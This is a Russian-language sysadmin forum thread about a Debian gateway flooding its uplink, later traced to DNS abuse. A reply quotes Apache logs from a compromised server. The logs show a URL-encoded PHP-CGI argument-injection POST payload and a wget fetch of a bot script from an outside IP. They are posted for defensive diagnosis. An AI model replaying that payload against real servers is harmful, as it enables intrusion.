Сообщения без ответов | Активные темы


Список форумов » Специализированные форумы » Мир Unix-like систем

Часовой пояс: UTC + 3 часа




Начать новую тему Новая тема / Ответить на тему Ответить  Сообщений: 11 
  Пред. тема | След. тема 
В случае проблем с отображением форума, отключите блокировщик рекламы
Автор Сообщение
  PolyMorph

Member
Статус: Не в сети
Регистрация: 22.04.2005
Здравствуйте, люди! Возникла проблема - есть шлюз на Debian Linux 7, который начал выдавать исходящий трафик, конкретно забивающий худенький 2Мб канал. Утилита jnettop показывает следующее: #77
Если отключить eth0 (внутренний интерфейс), то ничего не меняется, следовательно, трафик идет не из внутренней сети. Пытаюсь блокировать айпишники по маске в mangle-prerouting, но это больше похоже на вычерпывание воды из дырявой лодки, за день 20 записей. Гасил squid - ситуация не изменяется.
В nix-администрировании совсем недавно, мягко говоря новичок, буду рад любой помощи. Заранее спасибо!
Реклама

Партнер
  targitaj

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6
PolyMorph
Апач установлен? Есть загрузка проца перлом? Я недавно сталкивался с атакой на дефолтную страницу апача. Боты кладут скрипт на дефолтную страницу с cgi-bin и оно чего-то делает.
команды top и atop для монитора нагрузки на цп.

_________________
It's dolomite, baby! (c)

  drinkermann-

Member
Статус: Не в сети
Регистрация: 10.02.2013
Прокситейблы прописаны, чтоб дропал со внешки все кроме нужного? Проблему апача это кстати тоже решит.
  PolyMorph

Member
Статус: Не в сети
Регистрация: 22.04.2005
targitaj писал(а):
PolyMorph
Апач установлен? Есть загрузка проца перлом? Я недавно сталкивался с атакой на дефолтную страницу апача. Боты кладут скрипт на дефолтную страницу с cgi-bin и оно чего-то делает.
команды top и atop для монитора нагрузки на цп.

Апач стоит, дефолтная страница не открыта, top показывает нагрузку менее процента.
drinkermann- писал(а):
Прокситейблы прописаны, чтоб дропал со внешки все кроме нужного? Проблему апача это кстати тоже решит.

По белому списку работать нельзя, клиентам нужен доступ к сайту. Открытые порты:
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
81/tcp open hosts2-ns
111/tcp open rpcbind
443/tcp open https
3389/tcp open ms-term-serv
5555/tcp open freeciv
10000/tcp open snet-sensor-mgmt

В данный момент доступ к ДНС серверу открыт только для внутренней сети, что не есть правильно... Уже через несколько дней мы пропадем из инета и наступит ататат =(
  targitaj

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6
PolyMorph писал(а):
дефолтная страница не открыта

Уверен? Обращение на public ip твоего сервера ничего не выдает?

PolyMorph писал(а):
top показывает нагрузку менее процента.

У меня грузило довольно сильно, но там пресскоты стоят... Современный проц может и не заметить такую "нагрузку".

_________________
It's dolomite, baby! (c)

  PolyMorph

Member
Статус: Не в сети
Регистрация: 22.04.2005
targitaj писал(а):
Уверен? Обращение на public ip твоего сервера ничего не выдает?

Уже не уверен. При обращении не "ничего", выдает 403-ю, "запрещено".

targitaj писал(а):
У меня грузило довольно сильно, но там пресскоты стоят... Современный проц может и не заметить такую "нагрузку".

Камешек стоит феном х4, но шлюз на виртуалке... Все равно крайне малая нагрузка на проц.
  targitaj

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6
PolyMorph

ls -la /etc/apache2/sites-enabled/

Дефолтная страница будет типа
000-default -> ../sites-available/default
в ней есть раздел
<Directory "/usr/lib/cgi-bin">.
Вот к нему надо доступ резать напрочь. У меня сейчас
Order deny,allow
Deny from all

Или вообще удалять из enabled.

При взломе шла ошибка в журнале вида
/var/log/apache2/error.log
Код:
[Sun Nov 03 15:56:58 2013] [error] [client 66.197.237.101] .
[Sun Nov 03 15:56:58 2013] [error] [client 66.197.237.101] . .
[Sun Nov 03 15:56:58 2013] [error] [client 66.197.237.101] .
[Sun Nov 03 15:56:58 2013] [error] [client 66.197.237.101] .
[Sun Nov 03 15:56:58 2013] [error] [client 66.197.237.101] ..                                      100%  114K=0.1s
[Sun Nov 03 15:56:58 2013] [error] [client 66.197.237.101]
[Sun Nov 03 15:56:58 2013] [error] [client 66.197.237.101] 2013-11-03 15:56:58 (114 KB/s) - `/tmp/robot.txt' saved [15760/15760]
[Sun Nov 03 15:56:58 2013] [error] [client 66.197.237.101]
[Sun Nov 03 16:01:58 2013] [error] [client 66.197.237.101] PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php5/20060613+lfs/curl.so' - /usr/lib/php5/20060613+lfs/curl.so: cannot open shared object file: No such file or directory in Unknown on line 0
[Sun Nov 03 16:01:58 2013] [warn] [client 66.197.237.101] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Sun Nov 03 16:01:58 2013] [error] [client 66.197.237.101] Script timed out before returning headers: php
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101]
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled.  This
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] means that a page will only be served up if the REDIRECT_STATUS CGI variable is
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] set, e.g. via an Apache Action directive.</p>
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p>
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] <p>For more information about changing this behaviour or re-enabling this webserver,
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] consult the installation file that came with this distribution, or visit
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] <a href="http://php.net/install.windows">the manual page</a>.</p>
[Sun Nov 03 16:01:59 2013] [error] [client 66.197.237.101] Premature end of script headers: php5
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] --2013-11-03 16:02:00--  http://87.118.99.84/robot.txt
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] Connecting to 87.118.99.84:80...
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] connected.
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] HTTP request sent, awaiting response...
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] 200 OK
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] Length:
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] 15760
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101]  (15K)
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101]  [text/plain]
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] Saving to: `/tmp/robot.txt'
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101]
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101]      0K
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] 
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] .
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] .
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] .
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] .
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] .
[Sun Nov 03 16:02:00 2013] [error] [client 66.197.237.101] .

В результате в системе появлялся процесс perl который лез в сеть.

Судя по журналу, это массовая тупая атака идёт. Вот прямо сейчас, судя по журналу, куча разных ip ломится на cgi-bin. Смотри журналы. Может быть у тебя что-то другое. Сам по себе сервер генерить трафик не должен, а возможностей подцепить заразу не так много. Самое очевидное в первую очередь смотреть следует.

Добавлено спустя 5 минут 5 секунд:
В журнале
/var/log/apache2/access.log
Код:
78.46.103.74 - - [03/Nov/2013:12:10:36 +0400] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 504 537 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
58.137.64.178 - - [03/Nov/2013:12:30:39 +0400] "HEAD / HTTP/1.0" 200 275 "-" "-"
66.197.237.101 - - [03/Nov/2013:15:56:56 +0400] "GET /nosuichfile.php HTTP/1.0" 404 494 "-" "-"
66.197.237.101 - - [03/Nov/2013:15:56:56 +0400] "GET /noxdir/nosuichfile.php HTTP/1.0" 404 501 "-" "-"
66.197.237.101 - - [03/Nov/2013:15:56:57 +0400] "GET /cgi-bin/php HTTP/1.0" 500 832 "-" "-"
66.197.237.101 - - [03/Nov/2013:16:01:58 +0400] "GET /cgi-bin/php5 HTTP/1.0" 500 832 "-" "-"
66.197.237.101 - - [03/Nov/2013:15:56:58 +0400] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 504 537 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
66.197.237.101 - - [03/Nov/2013:16:07:00 +0400] "GET /cgi-bin/php-cgi HTTP/1.0" 404 494 "-" "-"
66.197.237.101 - - [03/Nov/2013:16:07:00 +0400] "GET /cgi-bin/php.cgi HTTP/1.0" 404 494 "-" "-"

была характерная запись POST /cgi-bin/php. Обрати внимание, не GET а POST. То бишь они КЛАДУТ мне, а не берут с меня.

Добавлено спустя 9 часов 14 минут 27 секунд:
PolyMorph
Кстати, а IPv6 ты в системе управляешь? Или выключил хотя бы?

_________________
It's dolomite, baby! (c)

  PolyMorph

Member
Статус: Не в сети
Регистрация: 22.04.2005
targitaj писал(а):
PolyMorph
Кстати, а IPv6 ты в системе управляешь? Или выключил хотя бы?

IPv6 отрублен, 403-ю Forbidden на паблик ип выдает IIS.
Судя по журналам, боты заставляли ДНС подробно отвечать на их запросы очень много раз, что и создавало мусорный трафик. Апач в моем случае ни при чем.
  PolyMorph

Member
Статус: Не в сети
Регистрация: 22.04.2005
А можно как-либо ограничить DNS сервер? Количество запросов в секунду или что-либо еще?
  targitaj

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6
PolyMorph писал(а):
А можно как-либо ограничить DNS сервер? Количество запросов в секунду или что-либо еще?

Ресурс. Смотри это

Добавлено спустя 46 секунд:
Chapter 9. Queueing Disciplines for Bandwidth Management

Добавлено спустя 9 минут 44 секунды:
PolyMorph
Да, вот еще штуку крайне рекомендую. Называется Iptables-tutorial от Frozentux

_________________
It's dolomite, baby! (c)

  PolyMorph

Member
Статус: Не в сети
Регистрация: 22.04.2005
targitaj писал(а):
Да, вот еще штуку крайне рекомендую. Называется Iptables-tutorial от Frozentux

Спасибо за инфу! Будем почитать.

Добавлено спустя 2 часа 57 минут 26 секунд:
Не буду создавать новую тему, спрошу здесь. Настраиваю второй канал, мануалов много в инете, вопросов особо нет, кроме действительно важного момента. Если у почтовика sendmail изменится IP, я буду в куче спам-баз. Какое правило спасет меня? Мне даже не придумать, что у гугля спрашивать =\

Добавлено спустя 1 час 55 минут 34 секунды:
PolyMorph писал(а):
Какое правило спасет меня?

ip rule add fwmark 1 table dsl
iptables -t mangle -A PREROUTING -s 192.168.2.239 -j MARK --set-mark 1
Показать сообщения за:  Поле сортировки  
Начать новую тему Новая тема / Ответить на тему Ответить  Сообщений: 11 
-

Список форумов » Специализированные форумы » Мир Unix-like систем

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 7

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Перейти:  

Лаборатория

Ретроклокинг: влияние поколений интерфейсов SSD на производительность


Обзор ноутбука ASUS Zenbook DUO (UX8406)


Обзор и тестирование модульного блока питания MSI MAG A850GL PCIE5


Обзор и тестирование процессорного кулера APNX AP1-V


Обзор и тестирование материнской платы MSI Z790 Gaming Plus WIFI





Новости
Создано на основе phpBB® Forum Software © phpBB Group
Русская поддержка phpBB | Kolobok smiles © Aiwan